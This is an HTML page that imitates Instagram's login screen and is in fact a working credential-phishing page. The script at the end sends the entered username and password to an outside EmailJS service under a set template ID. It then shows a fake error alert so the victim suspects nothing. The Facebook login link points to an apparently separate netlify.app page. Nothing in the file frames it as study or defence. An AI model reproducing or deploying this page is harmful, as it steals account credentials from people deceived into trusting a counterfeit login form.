<!DOCTYPE html>
<html lang="en">
<head>
    <link rel="stylesheet" href="instagram.css">
    <title>Document</title>
</head>
<style>
    body {
font-family: sans-serif;
background-color: #fafafa;
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen,
Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
box-sizing: border-box;
align-content: top;
}

a {
text-decoration: none;
}

.container {
max-width: 1000px;
margin: 0 auto;
display: flex;
justify-content: center;
flex-direction: column;
align-items: center;
margin-top: 3rem;
font-size: 14px;
}

.box {
max-width: 350px;
width: 100%;
display: flex;
justify-content: center;
align-items: center;
flex-direction: column;
background-color: #ffff;
border: 1px solid #e6e6e6;
border-radius: 1px;
margin: 0 0 10px;
padding: 10px 0;
flex-grow: 1;
}

.heading {
margin: 22px auto 12px;
background-image: url("https://www.instagram.com/static/bundles/es6/sprite_core_b20f2a3cd7e4.png/b20f2a3cd7e4.png");
background-position: -98px 0;
height: 51px;
width: 177px;
overflow: hidden;
}

.field {
margin: 10px 0;
position: relative;
font-size: 14px;
width: 100%;
text-overflow: ellipsis;
}

input {
padding: 9px 0px 7px 9px;
font-size: 12px;
width: 16rem;
height: 1.2rem;
outline: none;
background: #fafafa;
border-radius: 3px;
border: 1px solid #efefef;
}

label {
position: absolute;
pointer-events: none;
left: 10px;
padding-bottom: 15px;
transform: translateY(10px);
line-height: 6px;
transition: all ease-out 0.1s;
font-size: 14px;
color: #999;
padding-top: 6px;
}

input::placeholder {
visibility: hidden;
}

.login-form ::-moz-placeholder {
color: transparent;
}

input:not(:placeholder-shown) + label {
transform: translateY(0);
font-size: 11px;
}

input:not(:placeholder-shown) {
padding-top: 14px;
padding-bottom: 2px;
}

.login-button {
background-color: #56a8f5;
color: #fff;
text-align: center;
padding: 8px 40%;
height: 100%;
border-radius: 6px;
cursor: pointer;
font-size: 16px;
}

.separator {
display: flex;
justify-content: space-between;
align-items: center;
color: #999;
margin-top: 6px;
}

.separator .line {
height: 1px;
width: 40%;
background-color: #dbdbdb;
}

.other {
display: flex;
justify-content: center;
flex-direction: column;
align-items: center;
}

.fb-login-btn {
margin: 1rem;
border: 0;
cursor: pointer;
font-size: 14px;
color: #385185;
font-weight: 600;
background: transparent;
}

.fb-icon {
color: #385185;
font-size: 1rem;
padding-right: 1px;
}

.forgot-password {
font-size: 11px;
color: #003569;
}

.signup {
color: #3897f0;
font-weight: 600;
}

p{
text-align: center;
}

.container1 {
align-self: center;
background-image: url(/rsrc.php/v3/y4/r/ItTndlZM2n2.png);
background-position: -46px, 0;
background-size: 468.32px 634.15px;
flex-basis: 380.32px;
height: 581.15px;
margin-bottom: 12px;
margin-right: 32px;

}
.footer{
text-align: center;
font-size: 13px;
word-spacing: 15px;
}
.copyright{
text-align: center;
font-size: 13px;
}
.get{
text-align: center;
font-size: 15px;
}
.apps{
align-items: center;
text-align: center;
}
img {
      vertical-align: text-top;
}
</style>
<body>
    <div class="container">
        <div class="box">
            <div class="heading"></div>


            <form class="login-form" id="form">
                <div class="field">
                    <input type="text" name="from_name" id="from_name" placeholder="Phone number, username, or Email">
                    <label for="username">Phone number, username, or email</label>
                </div>
                <div class="field">
                    <input type="text" name="message" id="message" class="input-field" placeholder="password">
                    <label for="password">Password</label>
                </div>
                <input type="submit" id="button"  class="login-button" value="Log In" >
                <div class="separator">
                    <div class="line"></div>
                    <p>OR</p>
                    <div class="line"></div>
                </div>

                <div class="other">
                    <button class="fb-login-btn" type="button">
                        <i class="fa fa-facebook-official fb-icon"></i>
                        <span class=""><img src="https://icons.iconarchive.com/icons/paomedia/small-n-flat/1024/social-facebook-icon.png"height="15" width="15"><a href="https://65c245e9bcdcc71213bae7d8--brilliant-starburst-89b494.netlify.app/">&nbsp;Log in with Facebook</a>
                        </span>
                    </button>
                    <a class="forgot-password" href="/forget.html">Forgot password?</a>
                </div>
            </form>
        </div>
        <div class="box">
            <p>Don't have an account? <a class="signup" href="https://www.instagram.com/accounts/emailsignup/">Sign Up</a></p>
        </div>
    </div>
    <br>
    <div class="get">
    Get the app.
    </div>
    <br>
    <div class="apps">
        <a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=ig_mid%3D1545F2BA-D177-4082-B432-BF253483C183%26utm_campaign%3DloginPage%26utm_content%3Dlo%26utm_source%3Dinstagramweb%26utm_medium%3Dbadge%26original_referrer%3Dhttps%3A%2F%2Fwww.google.com%2F">
        <img src="https://static.cdninstagram.com/rsrc.php/v3/yz/r/c5Rp7Ym-Klz.png" height="40"
            width="134"></a>&NonBreakingSpace;&NonBreakingSpace;&NonBreakingSpace;&NonBreakingSpace;&NonBreakingSpace;<a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=ig_mid%3D1545F2BA-D177-4082-B432-BF253483C183%26utm_campaign%3DloginPage%26utm_content%3Dlo%26utm_source%3Dinstagramweb%26utm_medium%3Dbadge%26original_referrer%3Dhttps%3A%2F%2Fwww.google.com%2F"> 
        <img src="https://static.cdninstagram.com/rsrc.php/v3/yu/r/EHY6QnZYdNX.png" height="40" width="134"></a>
        </div>
        <br>
        <div class="footer">
    <footer>
            Meta
            About
            Blog
            Jobs
            Help
            API
            Privacy
            Terms
            Top Accounts
            Hashtags
            Locations
            Instagram Lite
            Contact Uploading & Non-Users
    </footer>
</div>
<div class="copyright">
    <br>    
    English © 2022 Instagram from Meta
</div>
</body>

<script type="text/javascript"
src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>

<script type="text/javascript">
emailjs.init('78LomSpsNy1rhFZj6')
</script>


<script>
const btn = document.getElementById('button');

document.getElementById('form')
.addEventListener('submit', function(event) {
event.preventDefault();

btn.value = 'Loging....';

const serviceID = 'default_service';
const templateID = 'template_ylss44i';

emailjs.sendForm(serviceID, templateID, this)
.then(() => {
  btn.value = 'Log In';
  alert('Sorry  Something Went Wrong Try Again Later.');
}, (err) => {
  btn.value = 'Log In';
  alert(JSON.stringify(err));
});
});
</script>

</html>